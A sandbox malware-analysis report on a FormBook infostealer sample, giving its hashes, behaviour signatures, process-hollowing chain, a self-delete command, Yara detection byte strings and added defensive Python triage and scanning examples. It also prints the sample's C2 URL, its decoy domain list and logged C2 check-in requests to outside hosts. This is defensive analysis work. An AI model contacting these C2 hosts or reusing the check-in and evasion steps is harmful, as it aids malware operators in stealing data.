
Windows Analysis Report JFBlvEr5H9

Overview

General Information

Sample Name: JFBlvEr5H9 (renamed file extension from none to exe)
Analysis ID: 458762
MD5: 214b1ddf045e4d6fdd73a5c8788d2adc
SHA1: 8bb7c462fb649d16edb98ab526df8475a329cc71
SHA256: d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
Tags: 32, exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • JFBlvEr5H9.exe (PID: 2036 cmdline: 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
    • JFBlvEr5H9.exe (PID: 1760 cmdline: C:\Users\user\Desktop\JFBlvEr5H9.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • mstsc.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
        • cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
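The tree above is the chain the signature list describes: the sample starts a second copy of itself (the "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures), the report shows the already-running explorer.exe (PID 3472) beneath that copy, a 32-bit Windows binary (mstsc.exe from SysWOW64) is started from it, and that binary runs cmd.exe /c del on the original file so the dropper disappears from disk. The mstsc.pdb debug string found inside the sample's own memory (AV Detection section) is consistent with it mapping the mstsc.exe image before launching it. The following Python is an added example, not part of the Joe Sandbox report, that turns those three observations into checks over process-creation records. The records are constructed from the tree; the root's parent PID, cmd.exe's image path and the field names are assumptions of the example.

```python
import re

# Constructed from the report's process tree. The root's ppid (1000), the
# image path of cmd.exe and the field names are assumptions of this example.
# explorer.exe (PID 3472) sits under PID 1760 in the report because the sample
# injected into the running shell, not because it created it, so it is not a
# creation event here.
EVENTS = [
    {"pid": 2036, "ppid": 1000, "image": r"C:\Users\user\Desktop\JFBlvEr5H9.exe",
     "cmdline": r"'C:\Users\user\Desktop\JFBlvEr5H9.exe'"},
    {"pid": 1760, "ppid": 2036, "image": r"C:\Users\user\Desktop\JFBlvEr5H9.exe",
     "cmdline": r"C:\Users\user\Desktop\JFBlvEr5H9.exe"},
    {"pid": 6868, "ppid": 1760, "image": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r"C:\Windows\SysWOW64\mstsc.exe"},
    {"pid": 7048, "ppid": 6868, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'"},
    {"pid": 7104, "ppid": 7048, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

WINDIR = "c:\\windows\\"


def _by_pid(events):
    return {e["pid"]: e for e in events}


def ancestors(pid, events):
    """Parent chain of pid, nearest first; stops at an unknown parent."""
    by_pid = _by_pid(events)
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def find_self_spawn(events):
    """(parent_pid, child_pid) where the child runs the parent's own image:
    the first step of the hollowing chain (a fresh copy, started suspended,
    whose memory is then replaced)."""
    by_pid = _by_pid(events)
    return [(by_pid[e["ppid"]]["pid"], e["pid"]) for e in events
            if e["ppid"] in by_pid
            and by_pid[e["ppid"]]["image"].lower() == e["image"].lower()]


# 'del', optional switches, optionally quoted path at the end of the line.
_DEL_RE = re.compile(r"""\bdel\b\s+(?:/\w\s+)*['"]?([^'"]+?)['"]?\s*$""", re.I)


def find_self_delete(events):
    """(cmd_pid, ancestor_pid, image) when cmd.exe deletes the image of one
    of its own ancestors, as the '/c del <sample>' step does here."""
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        m = _DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = m.group(1).strip().lower()
        for anc in ancestors(e["pid"], events):
            if anc["image"].lower() == target:
                hits.append((e["pid"], anc["pid"], anc["image"]))
                break
    return hits


def find_windows_binary_with_user_parent(events):
    """(parent_pid, child_pid, image) for a binary under the Windows directory
    created by a parent outside it (mstsc.exe under the sample). Noisy alone;
    it earns its place combined with the two checks above."""
    by_pid = _by_pid(events)
    hits = []
    for e in events:
        p = by_pid.get(e["ppid"])
        if p is None:
            continue
        if e["image"].lower().startswith(WINDIR) and not p["image"].lower().startswith(WINDIR):
            hits.append((p["pid"], e["pid"], e["image"]))
    return hits


def triage(events):
    """Run all three checks; score counts how many fired."""
    findings = {
        "self_spawn": find_self_spawn(events),
        "self_delete": find_self_delete(events),
        "windows_binary_user_parent": find_windows_binary_with_user_parent(events),
    }
    findings["score"] = sum(1 for v in findings.values() if v)
    return findings


if __name__ == "__main__":
    for name, value in triage(EVENTS).items():
        print(name, value)
```

Run against the constructed tree all three checks fire and the score is 3; on a normal desktop each check alone produces occasional hits (installers re-launch themselves, users start Windows tools), which is why the combination, with the self-delete as the strongest single signal, is what should page an analyst.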

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row as offset:$name: bytes)
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • the same ten $sequence_0 to $sequence_9 hits, at the same offsets as in the 00000004 dump above (0x85e8, 0x8972, 0x14685, 0x14171, 0x14787, 0x148ff, 0x938a, 0x133ec, 0xa102, 0x19777, 0x1a81a)
(18 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • the same ten $sequence_0 to $sequence_9 hits, at the same offsets as in the 00000004 memory dump above
4.2.JFBlvEr5H9.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
4.2.JFBlvEr5H9.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.JFBlvEr5H9.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)
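Two things in the string listing above are worth reading rather than just counting. $sequence_0 decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, i.e. a time-stamp-counter delta, which is the code behind the "Tries to detect virtualization through RDTSC time measurements" signature. The JPCERT strings are all 68 xx xx xx xx, a push imm32: the constants are what the unpacked bot pushes to find sqlite3 routines by hashed name instead of through an import table, which is why the rule is named after sqlite3 and why the family lands under E-Banking Fraud. The offsets in the .unpack listing are exactly 0xE00 below the .raw.unpack ones, consistent with one being a file offset in a rebuilt PE and the other an offset into the in-memory image. The Python below is an added example, not part of the report and not the rule authors' code: it re-implements plain byte-sequence matching without yara-python, decodes the pushed immediate, and finds runs of inline nop bytes (the "Found inlined nop instructions" signature). The scanned buffer is constructed here with the report's patterns written at the report's offsets; it is not a dump of the sample, and the rules' own conditions (how many strings must match) are not reproduced.

```python
import struct

# Strings copied from the report's Yara listing (hex exactly as shown).
YARA_SIGNATOR = {  # rule Formbook_1, Felix Bilstein / yara-signator
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",     # pop ebp; ret; lea edx,[eax+7Ch]; cmp dl,7
}
JPCERT = {  # rule Formbook, JPCERT/CC; every string is 'push imm32'
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
RULES = {"Formbook_1": YARA_SIGNATOR, "Formbook": JPCERT}


def hexpat(text):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(text.replace(" ", ""))


def find_all(buf, pat):
    """Every offset of pat in buf, overlapping hits included."""
    hits, i = [], buf.find(pat)
    while i != -1:
        hits.append(i)
        i = buf.find(pat, i + 1)
    return hits


def scan(buf, rules):
    """{rule: {string: [offsets]}} for every rule with at least one hit.
    Raw hits only; the rules' 'N of them' conditions are not applied."""
    out = {}
    for rule, strings in rules.items():
        hits = {n: find_all(buf, hexpat(h)) for n, h in strings.items()}
        hits = {n: offs for n, offs in hits.items() if offs}
        if hits:
            out[rule] = hits
    return out


def pushed_immediate(buf, off):
    """Decode 'push imm32' (opcode 0x68) at off and return the little-endian
    constant, the hashed-name value the bot uses for its lookup."""
    if buf[off] != 0x68:
        raise ValueError("no push imm32 at 0x%x" % off)
    return struct.unpack_from("<I", buf, off + 1)[0]


def nop_runs(buf, min_len=4):
    """(offset, length) of every run of >= min_len 0x90 bytes."""
    runs, i, n = [], 0, len(buf)
    while i < n:
        if buf[i] != 0x90:
            i += 1
            continue
        j = i
        while j < n and buf[j] == 0x90:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i))
        i = j
    return runs


def build_sample():
    """Constructed buffer: zero filler with the report's patterns placed at the
    offsets listed for the 0x1530000 dump, plus a 4-byte nop run followed by
    pop edi (the shape of the '4x nop then pop edi' hit). Not sample bytes."""
    buf = bytearray(0x17000)
    layout = {
        0x85e8: YARA_SIGNATOR["$sequence_0"], 0x8972: YARA_SIGNATOR["$sequence_0"],
        0x166a9: JPCERT["$sqlite3step"], 0x167bc: JPCERT["$sqlite3step"],
        0x166d8: JPCERT["$sqlite3text"], 0x167fd: JPCERT["$sqlite3text"],
        0x166eb: JPCERT["$sqlite3blob"], 0x16813: JPCERT["$sqlite3blob"],
        0x5000: "90 90 90 90 5F",
    }
    for off, hx in layout.items():
        pat = hexpat(hx)
        buf[off:off + len(pat)] = pat
    return bytes(buf)


SAMPLE = build_sample()

if __name__ == "__main__":
    for rule, hits in scan(SAMPLE, RULES).items():
        for name, offs in hits.items():
            print(rule, name, [hex(o) for o in offs])
    print(hex(pushed_immediate(SAMPLE, 0x166a9)))
    print([(hex(o), n) for o, n in nop_runs(SAMPLE)])
```

Pointing scan() at a real dump instead of SAMPLE reproduces the offsets in the table; pointing it at the rebuilt .unpack file shifts every hit by the same constant, which is the quick way to confirm that two listings describe the same unpacked image.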

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf; Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook, the same C2 list and decoy list given under Malware Configuration above
Multi AV Scanner detection for submitted file
Source: JFBlvEr5H9.exe; VirusTotal: Detection: 20%
Source: JFBlvEr5H9.exe; ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match; File source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: JFBlvEr5H9.exe; Joe Sandbox ML: detected
Source: 4.2.JFBlvEr5H9.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: JFBlvEr5H9.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: JFBlvEr5H9.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
Source: Binary string: mstsc.pdbGCTL; source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb; source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb; source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_01082130
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_01082121
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_01083B22
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h; 0_2_01083B30
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then pop edi; 4_2_00416282
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe; Code function: 4x nop then pop ebx; 4_2_00406A94
Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 4x nop then pop edi; 21_2_00706282
Source: C:\Windows\SysWOW64\mstsc.exe; Code function: 4x nop then pop ebx; 21_2_006F6A95

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.adultpeace.com/p2io/
Source: global traffic; HTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1; Host: www.aideliveryrobot.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (non-printable)
Source: global traffic; HTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1; Host: www.anewdistraction.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (non-printable)
Source: Joe Sandbox View; IP Address: 52.20.84.62
Source: Joe Sandbox View; ASN Name: AMAZON-AES US
Source: global traffic; HTTP traffic detected: the two GET requests to www.aideliveryrobot.com and www.anewdistraction.com listed above (reported a second time, without a User-Agent header in either request)
Source: unknown; DNS traffic detected: queries for: www.pyithuhluttaw.net
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Tue, 03 Aug 2021 16:14:43 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a; Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0
          Source: JFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: JFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: JFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comda
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comion
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: JFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comn
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsivd
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn3
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnX
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnicr
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-nX
